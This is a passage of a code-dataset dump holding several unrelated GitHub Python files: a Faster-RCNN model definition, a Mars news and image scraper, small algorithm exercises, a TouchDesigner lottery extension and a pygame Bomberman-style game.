name='rpn_conv1')(base_layers)\n\n # 利用一个1x1卷积调整通道数,获得预测结果\n # rpn_class只预测该先验框是否包含物体\n anchors_class = Conv2D(num_anchors, (1, 1), activation='sigmoid',\n kernel_initializer='uniform', name='rpn_out_class')(x)\n # 预测每个先验框的变化量,4代表变化量的x,y,w,h\n anchors_offset = Conv2D(num_anchors * 4, (1, 1), activation='linear',\n kernel_initializer='zero', name='rpn_out_regress')(x)\n\n anchors_class = Reshape((-1, 1), name=\"classification\")(anchors_class)\n anchors_offset = Reshape((-1, 4), name=\"regression\")(anchors_offset)\n\n return [anchors_class, anchors_offset]\n\n\n# 将共享特征层和建议框传入classifier网络\n# 该网络结果会对建议框进行调整获得预测框\ndef get_classifier(base_layers, input_rois, nb_classes=21, pooling_regions=14):\n '''\n Faster-RCNN网络模型\n Parameters\n ----------\n base_layers: resnet50输出的特征层(None,38,38,1024)\n input_rois:\n nb_classes\n pooling_regions\n\n Returns\n -------\n\n '''\n # num_rois:一张图片中建议框数量\n # num_rois, 38, 38, 1024 -> num_rois, 14, 14, 2048\n out_roi_pool = RoiPoolingConv()([base_layers, input_rois, pooling_regions])\n # out_roi_pool = RoiPoolingConv(pooling_regions)([base_layers, input_rois])\n # num_rois, 14, 14, 1024 -> num_rois, 1, 1, 2048\n out = classifier_layers(out_roi_pool)\n # TimeDistributed: 对batch_size中的每一个单独做处理\n # num_rois, 1, 1, 1024 -> num_rois, 2048\n out = TimeDistributed(Flatten())(out)\n\n # num_rois, 1, 1, 1024 -> num_rois, nb_classes\n # (batch_size,num_rois,nb_classes),None:batch_size,num_rois:每张图片的建议框数量,nb_classes:每个建议框预测的类别\n proposal_boxes_class = TimeDistributed(Dense(nb_classes,\n activation='softmax',\n kernel_initializer='zero'),\n name=f'dense_class_{nb_classes}')(out)\n # num_rois, 1, 1, 1024 -> num_rois, 4 * (nb_classes-1)\n # (batch_size,num_rois,4*(nb_classes-1)), 4*(nb_classes-1):每个建议框预测的所有类别的建议框变化量. 这个变化量+建议框=预测框\n proposal_boxes_offset = TimeDistributed(Dense(4 * (nb_classes - 1),\n activation='linear',\n kernel_initializer='zero'),\n name=f'dense_regress_{nb_classes}')(out)\n return [proposal_boxes_class, proposal_boxes_offset]\n\n\ndef get_model(config, num_classes):\n '''\n 创建训练网络模型\n Parameters\n ----------\n config\n num_classes\n\n Returns\n -------\n\n '''\n # 输入主干提取的图片\n inputs = Input(shape=(None, None, 3))\n # roi-pooling层的输入,从rpn层获得的最后建议框,None:一张图片中建议框数量\n roi_input = Input(shape=(None, 4))\n\n # 假设输入为600,600,3\n # 获得一个38,38,1024的共享特征层base_layers\n base_layers = ResNet50(inputs)\n\n # 每个特征点9个先验框,先验框边长数量*先验框宽高比例数\n num_anchors = len(config.anchor_box_scales) * len(config.anchor_box_ratios)\n\n # 将共享特征层传入建议框网络\n # 该网络结果会对先验框进行调整获得建议框\n rpn = get_rpn(base_layers, num_anchors)\n # 这是包含在下面moel_all中的子网络,不必单独训练model_rpn,因为下面model_all训练时会同步更新\n # model_rpn的权重。model_rpn的作用是每次训练和预测时生成用于截取特征图的建议框。训练时每个batch_size\n # 都会更新权重,向好的方向调整,获得的建议框也会越来越精确。额~,我怎么突然想起了GAN网络...\n model_rpn = Model(inputs, rpn)\n\n # 将共享特征层和建议框传入classifier网络\n # 该网络结果会对建议框进行调整获得预测框\n classifier = get_classifier(base_layers, roi_input, num_classes, config.pooling_regions)\n # 构建包含rpn和分类的两个网络,一起训练,使得两个网络的损失函数整体最小\n model_all = Model([inputs, roi_input], rpn + classifier)\n\n return model_rpn, model_all\n\n\ndef get_predict_model(config, num_classes):\n '''\n 训练时两步一起训练,使得loss全部最小,预测时分开,加快预测速度\n Parameters\n ----------\n config\n num_classes\n\n Returns\n -------\n\n '''\n # 输入主干提取的图片\n inputs = Input(shape=(None, None, 3))\n # roi-pooling层的输入,从rpn层获得的最后建议框,None:一张图片中建议框数量\n roi_input = Input(shape=(None, 4))\n # 主干网络输出的特征层,预测时作为分类网络的输入\n feature_map_input = Input(shape=(None, None, 1024))\n\n # 假设输入为600,600,3, 获得一个38,38,1024的共享特征层base_layers\n base_layers = ResNet50(inputs)\n\n # 每个特征点9个先验框\n num_anchors = len(config.anchor_box_scales) * len(config.anchor_box_ratios)\n\n # 将共享特征层传入建议框网络\n # 该网络结果会对先验框进行调整获得建议框\n rpn = get_rpn(base_layers, num_anchors)\n model_rpn = Model(inputs, rpn + [base_layers])\n\n # 将共享特征层和建议框传入classifier网络\n # 该网络结果会对建议框进行调整获得预测框\n classifier = get_classifier(feature_map_input, roi_input, num_classes, config.pooling_regions)\n # 此处仅构建分类模型,与训练时的模型不同\n model_classifier_only = Model([feature_map_input, roi_input], classifier)\n\n return model_rpn, model_classifier_only\n","repo_name":"yblir/faster-RCNN","sub_path":"nets/frcnn.py","file_name":"frcnn.py","file_ext":"py","file_size_in_byte":6670,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20655940875","text":"# Import Splinter, BeautifulSoup, and Pandas\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup as soup\nimport pandas as pd\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n# Set the executable path and initialize Splinter\nexecutable_path = {'executable_path': ChromeDriverManager().install()}\nbrowser = Browser('chrome', **executable_path, headless=False)\n\n# ### Visit the NASA Mars News Site\nurl = 'https://redplanetscience.com/'\nbrowser.visit(url)\n\n# Optional delay for loading the page\nbrowser.is_element_present_by_css('div.list_text', wait_time=1)\n\n# Convert the browser html to a soup object and then quit the browser\nhtml = browser.html\nnews_soup = soup(html, 'html.parser')\n\nslide_elem = news_soup.select_one('div.list_text')\nslide_elem.find('div', class_='content_title')\n\n# Use the parent element to find the first a tag and save it as `news_title`\nnews_title = slide_elem.find('div', class_='content_title').get_text()\nnews_title\n\n# Use the parent element to find the paragraph text\nnews_p = slide_elem.find('div', class_='article_teaser_body').get_text()\nnews_p\n\n# JPL Space Images Featured Image\n\n# Visit URL\nurl = 'https://spaceimages-mars.com'\nbrowser.visit(url)\n\n# Find and click the full image button\nfull_image_elem = browser.find_by_tag('button')[1]\nfull_image_elem.click()\n\n# Parse the resulting html with soup\nhtml = browser.html\nimg_soup = soup(html, 'html.parser')\nimg_soup\n\n# find the relative image url\nimg_url_rel = img_soup.find('img', class_='fancybox-image').get('src')\nimg_url_rel\n\n# Use the base url to create an absolute url\nimg_url = f'https://spaceimages-mars.com/{img_url_rel}'\nimg_url\n\n# Mars Facts\n\ndf = pd.read_html('https://galaxyfacts-mars.com')[0]\ndf.head()\n\ndf.columns=['Description', 'Mars', 'Earth']\ndf.set_index('Description', inplace=True)\ndf\n\ndf.to_html()\n\n# D1: Scrape High-Resolution Mars’ Hemisphere Images and Titles\n\n# Hemispheres\n\n# 1. Use browser to visit the URL \nurl = 'https://marshemispheres.com/'\n\nbrowser.visit(url)\n\n# 2. Create a list to hold the images and titles.\nhemisphere_image_urls = []\n\n# 3. Write code to retrieve the image urls and titles for each hemisphere.\nfor i in range(3, 7):\n # Create hemispheres dict\n hemispheres = {}\n \n # click thumbnail button to view photo\n full_image_thumb = browser.find_by_tag('img')[i]\n full_image_thumb.click()\n \n # parse the html with soup\n html = browser.html\n img_soup = soup(html, 'html.parser')\n \n # find title of image\n title = img_soup.find(class_='title').get_text()\n \n # find href for image url\n downloads = img_soup.find_all('div', class_='downloads')\n for d in downloads:\n ul = d.find('ul')\n link = ul.find_all('a')[0]\n #link = li.find('a')\n href = link['href']\n img_url = 'https://marshemispheres.com/'+href\n # print to verify results\n print(title)\n print(img_url)\n \n # add title and url to dict\n hemispheres = {'img_url': img_url,\n 'title': title}\n \n # append dict to list\n hemisphere_image_urls.append(hemispheres)\n \n # click the back button to return to main page\n browser.back()\n\n# 4. Print the list that holds the dictionary of each image url and title.\nhemisphere_image_urls\n\n# 5. Quit the browser\nbrowser.quit()","repo_name":"bweirich/Mission_to_Mars","sub_path":"Mission_to_Mars_Challenge.py","file_name":"Mission_to_Mars_Challenge.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2351983909","text":"print('Успеваемость в классе')\n\n# В классе N человек.\n# Каждый из них получил за урок по информатике оценку: 3, 4 или 5, двоек сегодня не было.\n#\n# Программа получает список оценок - N чисел - и выводит на экран сообщение о том,\n# кого сегодня больше: отличников, хорошистов или троечников.\n\npeoples = int(input('Человек в классе: '))\n\ngrade_C = 0\ngrade_B = 0\ngrade_A = 0\n\nfor i in range(peoples):\n grade = int(input('Оценка: '))\n if grade == 3:\n grade_C += 1\n elif grade == 4:\n grade_B += 1\n else:\n grade_A += 1\n\nif (grade_A > grade_B) and (grade_A > grade_C):\n above = 'отличников'\nelif (grade_A == grade_B) and (grade_A > grade_C):\n above = 'отличников и хорошистов'\nelif (grade_A > grade_B) and (grade_A == grade_C):\n above = 'отличников и троечников'\nelif (grade_B > grade_C):\n above = 'хорошистов'\nelif (grade_B == grade_C):\n above = 'хорошистов и троечников'\nelse:\n above = 'троечников'\n\nprint('Сегодня больше', above)\n","repo_name":"Vira1607/grade_school","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29232976216","text":"import string\n\ndef isAnagram(a: str, b: str):\n for ch in string.ascii_lowercase:\n if a.count(ch) != b.count(ch):\n return False\n return True\n\nfor _ in range(int(input())):\n a, b = input().split()\n if isAnagram(a, b):\n print(f'{a} & {b} are anagrams.')\n else:\n print(f'{a} & {b} are NOT anagrams.')\n","repo_name":"codingNoob12/algorithm-study","sub_path":"BOJ/bronze1/2022-12-16/6996.py","file_name":"6996.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18244673378","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n# https://leetcode.com/problems/minimum-domino-rotations-for-equal-row/\n\n# Time complexity: O()\n# Space complexity: O()\n\n# 观察,因为只能上下交换,所以可以出现的相同的数,不是A[0]就是B[0],否则就返回-1\n\n\nclass Solution:\n # 如果可以得到解的话,说明 A中目标的个数+ B目标个数 - AB同一位置出现相同的个数 == N\n def minDominoRotations(self, A: List[int], B: List[int]) -> int:\n n = len(A)\n for i in range(1, 7):\n if all(i in p for p in zip(A, B)):\n return n - max(A.count(i), B.count(i))\n return -1\n\n def minDominoRotations(self, A: List[int], B: List[int]) -> int:\n n = len(A)\n\n # 检查AB能否换成A[0], ab记录更换次数\n i = 0\n a = b = 0\n # a -> B to A\n # b -> A to B\n while i < n and (A[i] == A[0] or B[i] == A[0]):\n if A[i] != A[0]: a += 1\n if B[i] != A[0]: b += 1\n if i == n - 1: return min(a, b)\n i += 1\n\n # 检查AB能否换成B[0], ab记录更换次数\n i = 0\n a = b = 0\n # a -> B to A\n # b -> A to B\n while i < n and (A[i] == B[0] or B[i] == B[0]):\n if A[i] != B[0]: a += 1\n if B[i] != B[0]: b += 1\n if i == n - 1: return min(a, b)\n i += 1\n\n return -1\n","repo_name":"zihuaweng/leetcode-solutions","sub_path":"leetcode_python/1007.Minimum_Domino_Rotations_For_Equal_Row.py","file_name":"1007.Minimum_Domino_Rotations_For_Equal_Row.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"10052318643","text":"import TDFunctions as TDF\nimport webbrowser\nimport datetime\nimport time\n\nclass LotteryExt:\n\t\"\"\"\n\tLotteryExt drives a global component for quickly adding entrants to a\n\tlottery pool and selecting a random winner by rotating through the entrants\n\twheel of fortune style.\n\t\"\"\"\n\tdef __init__(self, ownerComp):\n\t\t# The component to which this extension is attached\n\t\tself.ownerComp = ownerComp\n\n\t@property\n\tdef Table(self):\n\t\ttable = self.ownerComp.op('table_lottery')\n\t\treturn table\n\n#\tpublic methods\n\tdef Addentrant(self, user=None):\n\t\t'''\n\t\tspecify a user and add a time stamped entry to the table. \n\t\tif no user is specified, add entry from ownerComp customPar['Entrantname']\n\t\t'''\n\t\ttable = self.Table\n\t\tif not user:\n\t\t\tuser = self.ownerComp.par.Entrantname.eval()\n\t\tepoch = time.time()\n\t\ttimeStamp = datetime.datetime.fromtimestamp(epoch).strftime('%Y_%m_%d_%H_%M_%S')\n\t\ttable.appendRow([user, timeStamp])\n\t\tself.ownerComp.par.Entrantname = ''\n\n\tdef Selectwinner(self, length : float=None):\n\t\t'''\n\t\ttrigger for winner selection process. if no length is specified,\n\t\tget length from ownerComp customPar['Selectionlength']\n\t\t'''\n\t\trandNum = tdu.remap(tdu.rand(absTime.frame),0, 1, 0, self.Table.numRows-2)\n\t\tself.ownerComp.op('speed1').par.resetvalue = randNum\n\t\tself.ownerComp.op('speed1').par.resetpulse.pulse()\n\t\tself.ownerComp.op('count1').par.resetvalue = int(randNum)\n\t\tself.ownerComp.op('count1').par.resetpulse.pulse()\n\t\tself.ownerComp.op('trigger1').par.triggerpulse.pulse()\n\t\top('audiofilein1').par.play = 1\n\t\t\n\n\tdef Cleartable(self):\n\t\t'''remove all entrants from the table'''\n\t\tself.Table.clear(keepFirstRow=True)\n\n\n\tdef Exporttable(self):\n\t\t'''timestamped method for export on exit'''\n\t\tfolder = self.ownerComp.par.Tablefolder.eval()\n\t\tepoch = time.time()\n\t\ttimeStamp = datetime.datetime.fromtimestamp(epoch).strftime('%Y_%m_%d')\n\t\tfileName = f'{folder}/table_lotto_{timeStamp}.py'\n\t\tself.Table.save(fileName)\n\n\tdef Exporttableas(self, fileName=None):\n\t\t'''save table as method for exporting lotto entrants'''\n\t\tfolder = self.ownerComp.par.Tablefolder.eval()\n\t\tif not fileName:\n\t\t\tfileName = ui.chooseFile(load=False, start=folder, \n\t\t\t\t\t\t\t\tfileTypes=['py'], title='Save table as:')\n\t\tif fileName:\n\t\t\tself.Table.save(fileName)\n\t\t\tprint(f'{self.Table} successfully saved as {fileName}')\n\n\tdef Importtable(self):\n\t\t'''method for importing an externalized lotto table'''\n\t\tfolder = self.ownerComp.par.Tablefolder.eval()\n\t\tfileName = ui.chooseFile(load=True, start=folder, \n\t\t\t\t\t\t\t\tfileTypes=['py'], title='Load table:')\n\t\timportProxy = self.ownerComp.op('importProxy')\n\t\tif fileName != None:\n\t\t\tui.undo.startBlock(f'undo {self.Table} import from {fileName}')\n\t\t\timportProxy.clear()\n\t\t\timportProxy.par.file = fileName\n\t\t\timportProxy.par.loadonstartpulse.pulse()\n\t\t\tself.Table.copy(importProxy)\n\t\t\tui.undo.endBlock()\n\t\t\tdebug(f'{self.Table} successfully imported from {fileName}')\n\n# support methods\n\n\tdef Readme(self):\n\t\t\"\"\"Pulse to open a floating Readme document\"\"\"\n\t\tself.ownerComp.op('readme').openViewer()\n\t\tdebug('readme')\n\n\tdef Support(self):\n\t\t'''partronize the creator'''\n\t\turl = self.ownerComp.par.Supporturl.eval()\n\t\twebbrowser.open(url)\n\n\tdef Git(self):\n\t\t'''navigate browser to git repo'''\n\t\twebbrowser.open(self.ownerComp.par.Github.val)\n\n# region callbacks\n\n# parexec_passThru callbacks\n\tdef onParValueChange(self, par, prev):\n\t\t\"\"\"parexec_passThru value change callbacks to condense logic to ext\"\"\"\n\t\tif par.name == 'Test':\n\t\t\tdebug('Test')\n\n\tdef onParPulse(self, par):\n\t\t\"\"\"parexec_passThru pulse callbacks to condense logic to ext\"\"\"\n\t\townerComp = self.ownerComp\n\t\tif par.name == 'Help':\n\t\t\tprint(help(self))\n\t\t\tui.messageBox('Help', 'help printed to textport', buttons=['ok'])\n\t\telse: \n\t\t\ttry:\n\t\t\t\tgetattr(ownerComp, par.name)()\n\t\t\texcept Exception as e:\n\t\t\t\tdebug(e)\n\n\n# end region","repo_name":"drmbt/DRMBT-TD_shared","sub_path":"Lottery/lib/modules/LotteryExt.py","file_name":"LotteryExt.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"36400758286","text":"import sys\nfrom collections import deque, defaultdict\ninput = sys.stdin.readline\n\nN = int(input())\n\nmp, mf, ms, mv = map(int, input().split())\n\ntable = []\nret = sys.maxsize\nretd = defaultdict(list)\n\nfor i in range(N):\n p, f, s, v, c = map(int, input().split())\n\n table.append({\n \"p\": p,\n \"f\": f,\n \"s\": s,\n \"v\": v,\n \"c\": c\n })\n\nfor i in range(1 << N):\n p = f = s = v = sum = 0\n tv = []\n for j in range(N):\n if i & (1 << j):\n tv.append(j + 1)\n curr = table[j]\n p += curr[\"p\"]\n f += curr[\"f\"]\n s += curr[\"s\"]\n v += curr[\"v\"]\n sum += curr[\"c\"]\n if p >= mp and f >= mf and s >= ms and v >= mv:\n if ret >= sum:\n ret = sum\n retd[ret].append(tv)\n\nif ret == sys.maxsize:\n print(-1)\nelse:\n print(ret)\n retd[ret].sort()\n for item in retd[ret][0]:\n print(item, end=\" \")\n","repo_name":"jhpung/PS","sub_path":"문제풀이/백준/비트마스킹/19942.py","file_name":"19942.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72134108624","text":"import pygame\nimport pytmx\n\n# variables globales\nWIDTH_SCREEN, HEIGHT_SCREEN = 272, 208\nPLAYER_SIZE = 16\nTILE_SIZE = 16\nPOSITION_PLAYER_X, POSITION_PLAYER_Y = 2, 1\nGAME_SCALE = 3\nFREE_TILE = 0\nNONE_TILE = 0\nPLAYER_SPEED = PLAYER_SIZE\nWHITE = (0, 0, 0)\nPATH_STAGE1_MAP = \"TiledMap/Stage1/Stage1.tmx\"\nPATH_PLAYER_SPRITE= \"Sprites/bomberman_main.png\"\nPATH_BLOCK_SPRITE= \"Sprites/block_town.png\"\nPATH_BOMB_SPRITE= \"Sprites/bomb.png\"\nPATH_EXPLOTION_SPRITE= \"Sprites/explotion.png\"\nPATH_TILE_SPRITE= \"Sprites/stage1_tile.png\"\nEXPLOSION_RADIUS = 1\nEXPLOSION_TIME = 18\nCLOCK_TIME = 8\n\nclass Player:\n def __init__(self, x, y, size, speed, sprite, game_scale, tile_size):\n self.posX = x * tile_size\n self.posY = y * tile_size\n self.size = size\n self.speed = speed\n self.scaled_player_sprite = self.load_sprites(sprite, game_scale, size)\n\n def load_sprites(self, sprite_name, game_scale, size):\n sprite = pygame.image.load(sprite_name)\n # Escala la imagen al tamaño del jugador\n scaled_player_sprite = pygame.transform.scale(sprite, (game_scale * size, size * game_scale))\n return scaled_player_sprite\n\n def move(self, movement_x, movement_y):\n self.posX += movement_x #offset_x\n self.posY += movement_y \n\n def draw(self, game_window, scale_game):\n scaled_size = int(self.size * scale_game)\n scaled_player_rect = pygame.Rect(self.posX * scale_game, self.posY * scale_game, scaled_size, scaled_size)\n # Dibuja el sprite en pantalla\n game_window.blit(self.scaled_player_sprite, scaled_player_rect)\n\n\nclass Destructible_Tile:\n collision_block = None\n def __init__(self, x, y, size, sprite, game_scale, tile_size):\n self.posX = x * tile_size\n self.posY = y * tile_size\n self.size = size\n self.animation_destructible_tile = Animation(sprite, 4, CLOCK_TIME, game_scale)\n\n def draw(self, game_window, scale_game):\n scaled_size = int(self.size * scale_game)\n game_window.blit(self.animation_destructible_tile.get_current_frame(), (self.posX * scale_game, self.posY * scale_game))\n self.collision_block = pygame.Rect(self.posX * scale_game, self.posY * scale_game, scaled_size, scaled_size)\n\n\n \nclass Bomb:\n def __init__(self, x, y, size, sprite_bomb, sprite_explotion, game_scale, explosion_radius, explosion_time, game_map):\n self.posX = x\n self.posY = y\n self.size = size\n self.game_scale = game_scale\n self.explotion_radius = explosion_radius\n self.explotion_time = explosion_time\n self.exploded = False\n self.destroy_tiles_in_radius(game_map, self.posX, self.posY, explosion_radius)\n \n #animacion\n self.animation_Bomb = Animation(sprite_bomb, 3, CLOCK_TIME, game_scale)\n self.animation_Explotion = Animation(sprite_explotion, 2, CLOCK_TIME, game_scale)\n\n\n def draw(self, game_window, scale_game):\n game_window.blit(self.animation_Bomb.get_current_frame(), (self.posX * scale_game, self.posY * scale_game))\n\n\n def explotion_countdown(self, game_window):\n if not self.exploded:\n self.explotion_time -= 1\n if self.explotion_time <= 0:\n self.exploded = True\n game_window.blit(self.animation_Explotion.get_current_frame(), ((self.posX-32) * self.game_scale, (self.posY-32) * self.game_scale))\n\n def destroy_tiles_in_radius(self, map_wall, bomb_posX, bomb_posY, explosion_radius):\n bomb_posX = int(bomb_posX/self.size)\n bomb_posY = int(bomb_posY/self.size)\n # Destruir en la fila horizontal hacia la izquierda\n for offset_x in range(1, explosion_radius + 1):\n tile_x = bomb_posX - offset_x\n if 0 <= tile_x < len(map_wall[0]):\n if map_wall[bomb_posY][tile_x] == NONE_TILE:\n print(\"anima <-\")\n print(map_wall[bomb_posY][tile_x])\n else:\n break\n # Destruir en la fila horizontal hacia la derecha\n for offset_x in range(1, explosion_radius + 1):\n #tile_x = int(bomb_posX/self.size) + offset_x\n tile_x = bomb_posX + offset_x\n if 0 <= tile_x < len(map_wall[0]):\n if map_wall[bomb_posY][tile_x] == NONE_TILE:\n print(\"anima ->\")\n print(map_wall[bomb_posY][tile_x])\n else:\n break\n \n # Destruir en la columna vertical hacia arriba\n for offset_y in range(1, explosion_radius + 1):\n tile_y = bomb_posY - offset_y\n if 0 <= tile_y < len(map_wall):\n if map_wall[tile_y][bomb_posX] == NONE_TILE:\n print(\"anima up\") \n print(map_wall[tile_y][bomb_posX])\n else:\n break\n \n # Destruir en la columna vertical hacia abajo\n for offset_y in range(1, explosion_radius+1):\n tile_y = bomb_posY + offset_y\n if 0 <= tile_y < len(map_wall):\n if map_wall[tile_y][bomb_posX] == NONE_TILE:\n print(\"anima down\")\n print(map_wall[tile_y][bomb_posX])\n else:\n break\n \n def check_for_enemy_hits(self):\n print(\"en progreso\")\n\n def check_for_bomberman_hit(self):\n print(\"en progreso\")\n\nclass Animation:\n def __init__(self, sprite_name, num_frames, speed, game_scale):\n self.animation_speed = speed\n self.frame_index = 0\n self.num_frames = num_frames\n self.frames = self.load_sprites(sprite_name, num_frames, game_scale)\n self.game_scale = game_scale\n\n def load_sprites(self, sprite_name, num_frames, game_scale):\n sprite_sheet = pygame.image.load(sprite_name)\n sprite_sheet = pygame.transform.scale(sprite_sheet, (game_scale* sprite_sheet.get_width(), sprite_sheet.get_height() * game_scale))\n frame_width = sprite_sheet.get_width() // num_frames\n frame_height = sprite_sheet.get_height()\n #sprite_list = [sprite_sheet.subsurface(pygame.Rect(i * frame_width, 0, frame_width, frame_height)) for i in range(num_frames)]\n sprite_list = []\n for i in range(num_frames):\n frame_rect = pygame.Rect(i * frame_width , 0, frame_width, frame_height)\n frame_image = sprite_sheet.subsurface(frame_rect)\n sprite_list.append(frame_image)\n return sprite_list\n\n def get_current_frame(self):\n self.frame_index = (self.frame_index + 1) % self.num_frames\n return self.frames[self.frame_index]\n \n\n\nclass GameEngine:\n map_game = None\n def __init__(self, width, height, GAME_SCALE, player_size, player_speed):\n pygame.init()\n self.running = True\n self.screen = pygame.display.set_mode((width * GAME_SCALE, height * GAME_SCALE))\n # Obtener las capas del mapa\n self.tmx_map = pytmx.load_pygame(PATH_STAGE1_MAP)\n self.terrain_layer = self.tmx_map.get_layer_by_name(\"Terrain\")\n self.wall_layer = self.tmx_map.get_layer_by_name(\"Wall\")\n self.block_layer = self.tmx_map.get_layer_by_name(\"Block\")\n self.tile_width = self.tmx_map.tilewidth \n self.tile_height = self.tmx_map.tileheight\n\n #instancias de objetos \n self.player = Player(POSITION_PLAYER_X, POSITION_PLAYER_Y, player_size, player_speed, PATH_PLAYER_SPRITE, GAME_SCALE, self.tile_width)\n self.game_scale = GAME_SCALE\n # Lista para almacenar instancias de destructible_tile\n self.destructible_tile = []\n self.append_destructible_tile_matrix(self.block_layer)\n self.bombs = []\n\n self.merge_matrix(self.wall_layer.data, self.block_layer.data)\n\n def append_destructible_tile_matrix(self, layer):\n for row in range(len(layer.data)):\n for Column in range(len(layer.data[row])):\n ID_tile = layer.data[row][Column]\n if ID_tile != NONE_TILE:\n block_size = self.tile_width # Ajusta el tamaño según tus necesidades\n block_sprite_path = PATH_TILE_SPRITE\n block = Destructible_Tile(Column, row, block_size, block_sprite_path, self.game_scale, self.tile_width)\n self.destructible_tile.append(block)\n\n\n def can_move_to(self, futureX, futureY): \n # Verificar si la posición (x, y) es transitable en la capa Wall.\n tile_x = int(futureX / self.tile_width)\n tile_y = int(futureY / self.tile_height)\n if len(self.wall_layer.data) > tile_y >= 0 and len(self.wall_layer.data[0]) > tile_x >= 0:\n ID_tile = self.wall_layer.data[tile_y][tile_x]\n if ID_tile == FREE_TILE:\n # logica SOLO para bloques con colisionadores de pygame\n future_player_position = pygame.Rect(futureX * self.game_scale, futureY * self.game_scale,\n self.player.size * self.game_scale, self.player.size * self.game_scale)\n\n for block in self.destructible_tile:\n if future_player_position.colliderect(block.collision_block):\n # Hay una colisión con un bloque, no permitir el movimiento\n return False\n # No hay colisión con bloques, permitir el movimiento\n return True\n return False\n\n def merge_matrix(self, matrix_wall, matrix_block):\n rows = len(matrix_wall)\n cols = len(matrix_wall[0])\n\n # Inicializar map_game con los valores de la primera matriz\n self.map_game = [row.copy() for row in matrix_wall]\n # Actualizar map_game con los valores no nulos de la segunda matriz\n for i in range(rows):\n for j in range(cols):\n if matrix_block[i][j] != NONE_TILE:\n self.map_game[i][j] = matrix_block[i][j]\n return self.map_game\n\n def draw_layer(self, layer):\n for row in range(len(layer.data)):\n for Column in range(len(layer.data[row])):\n ID_tile = layer.data[row][Column]\n if ID_tile != NONE_TILE:\n tile = self.tmx_map.get_tile_image_by_gid(ID_tile)\n scaled_tile = pygame.transform.scale(tile, (int(self.tile_width * self.game_scale),\n int(self.tile_height * self.game_scale)))\n self.screen.blit(scaled_tile, (Column * self.tile_width * self.game_scale,\n row * self.tile_height * self.game_scale))\n\n\n def handle_inputs(self):\n keys = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n\n # Detectar si la tecla de espacio está presionada\n if keys[pygame.K_SPACE]:\n Bomba = Bomb(self.player.posX, self.player.posY, self.player.size, PATH_BOMB_SPRITE, PATH_EXPLOTION_SPRITE, self.game_scale, EXPLOSION_RADIUS, EXPLOSION_TIME, self.map_game) \n self.bombs.append(Bomba)\n \n # Mover al jugador una baldosa cuando se presiona una tecla y la posición es transitable \n if keys[pygame.K_UP] and self.can_move_to(self.player.posX, self.player.posY - self.player.speed):\n self.player.move(0, -PLAYER_SPEED)\n elif keys[pygame.K_DOWN] and self.can_move_to(self.player.posX, self.player.posY + self.player.speed):\n self.player.move(0, PLAYER_SPEED)\n elif keys[pygame.K_LEFT] and self.can_move_to(self.player.posX - self.player.speed, self.player.posY):\n self.player.move(-PLAYER_SPEED, 0)\n elif keys[pygame.K_RIGHT] and self.can_move_to(self.player.posX + self.player.speed, self.player.posY):\n self.player.move(PLAYER_SPEED, 0)\n\n def update(self, clock):\n active_bombs = [] # Creamos una nueva lista para almacenar las bombas activas\n for bomb in self.bombs:\n if bomb.explotion_time > 0:\n active_bombs.append(bomb)\n self.bombs = active_bombs\n \n pygame.display.flip() # Actualizar la pantalla\n\n #pygame.time.delay(200) # Añadimos un pequeño retraso para controlar la velocidad del jugador\n clock.tick(CLOCK_TIME) # Controlar la velocidad del bucle principal / FPS por segundo\n\n def draw(self):\n self.screen.fill(WHITE) # Limpiar la pantalla \n \n\n self.draw_layer(self.terrain_layer)\n\n for bomb in self.bombs:\n bomb.explotion_countdown(self.screen)\n\n self.draw_layer(self.wall_layer)\n\n # Dibujar bomba\n for bomb in self.bombs:\n bomb.draw(self.screen, self.game_scale)\n\n # Dibujar al jugador\n self.player.draw(self.screen, self.game_scale)\n\n # Dibujar bloques\n for block in self.destructible_tile:\n block.draw(self.screen, self.game_scale)\n\n\n \n\n def run(self):\n clock = pygame.time.Clock()\n while self.running: # Bucle principal\n self.handle_inputs()\n self.draw()\n self.update(clock)\n pygame.quit()\n\n \ngame_engine = GameEngine(WIDTH_SCREEN , HEIGHT_SCREEN, GAME_SCALE, PLAYER_SIZE, PLAYER_SPEED)\ngame_engine.run()\n\n\n\n\n","repo_name":"unAbel/pygame_game","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":13438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2735776965","text":"# https://bitbucket.org/hrojas/learn-pandas\n\nimport pandas as pd\n\n#01\nnames = ['Bob','Jessica','Mary','John','Mel']\nbirths = [968, 155, 77, 578, 973]\nBabyDataSet = list(zip(names,births))\n\ndf = pd.DataFrame(data = BabyDataSet, columns=['Names', 'Births'])\n\n","repo_name":"JohnWSteill/EdProjs","sub_path":"PyEdProjs/Pandas/Rojas.py","file_name":"Rojas.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13639791350","text":"\"\"\"\nCreated on Thu Mar 12 15:03 2020\n\nThis script contains the class that is in charge to control\neverything related with the visual camera. \n\nActions to be performed with the camera:\n 1) Connect to the camera on the correct serial port (it may change)\n 2) Set the camera settings \n 3) Take images and store them to be readable by the main program\n 4) Save those images on the correct path \n 5) GPS coordinates are tagged directl on the image, not in the json file\n 6) write all the image path and the name on the json file\n\nTo do so, we will work with the pygame library for controlling the camera and \nas well as with numpy and cv2 (the same as the other programs contained on that project)\n\"\"\"\n\nimport 